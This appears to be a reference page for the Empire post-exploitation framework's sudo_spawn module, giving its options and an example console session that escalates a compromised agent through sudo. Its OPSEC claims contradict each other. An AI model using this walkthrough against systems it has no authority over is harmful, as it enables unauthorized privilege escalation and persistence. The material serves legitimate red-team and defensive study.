SudoSpawn - Empire Module


This page contains detailed information about how to use the python/privesc/multi/sudo_spawn Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

Name: SudoSpawn
Module: python/privesc/multi/sudo_spawn
Source code [1]: empire/server/modules/python/privesc/multi/sudo_spawn.yaml
Source code [2]: empire/server/modules/python/privesc/multi/sudo_spawn.py
MITRE ATT&CK: T1050, T1169
Language: Python
Needs admin: No
OPSEC safe: Yes
Background: No

The sudo_spawn module spawns a new Empire agent using sudo.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the sudo_spawn module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

This is a list of options that are required by the sudo_spawn module:

Agent
Agent to execute module on.

Listener
Listener to use.

Password
User password for sudo.

SafeChecks
Enable SafeChecks.
Default value: True.

Additional Module Options

This is a list of additional options that are supported by the sudo_spawn module:

UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.

Sudo_spawn Example Usage

Here's an example of how to use the sudo_spawn module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/multi/bash) > usemodule python/privesc/multi/sudo_spawn

 Author       @harmj0y                                 
 Background   False                                    
 Description  Spawns a new Empire agent using sudo.    
 Language     python                                   
 Name         python/privesc/multi/sudo_spawn          
 NeedsAdmin   False                                    
 OpsecSafe    True                                     
 Software     http://attack.mitre.org/software/T1169   
 Techniques   http://attack.mitre.org/techniques/T1050 


,Record Options--------,----------,------------------------------------,
| Name       | Value   | Required | Description                        |
|------------|---------|----------|------------------------------------|
| Agent      |         | True     | Agent to execute module on.        |
|------------|---------|----------|------------------------------------|
| Listener   |         | True     | Listener to use.                   |
|------------|---------|----------|------------------------------------|
| Password   |         | True     | User password for sudo.            |
|------------|---------|----------|------------------------------------|
| SafeChecks | True    | True     | Enable SafeChecks.                 |
|------------|---------|----------|------------------------------------|
| UserAgent  | default | False    | User-agent string to use for the   |
|            |         |          | staging request (default, none, or |
|            |         |          | other).                            |
'------------'---------'----------'------------------------------------'

(Empire: usemodule/python/privesc/multi/sudo_spawn) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/python/privesc/multi/sudo_spawn) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/python/privesc/multi/sudo_spawn) > set Password Password123
[*] Set Password to Password123
(Empire: usemodule/python/privesc/multi/sudo_spawn) > set SafeChecks True
[*] Set SafeChecks to True
(Empire: usemodule/python/privesc/multi/sudo_spawn) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

References

See Also

Check also the following modules related to this module:

Version

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.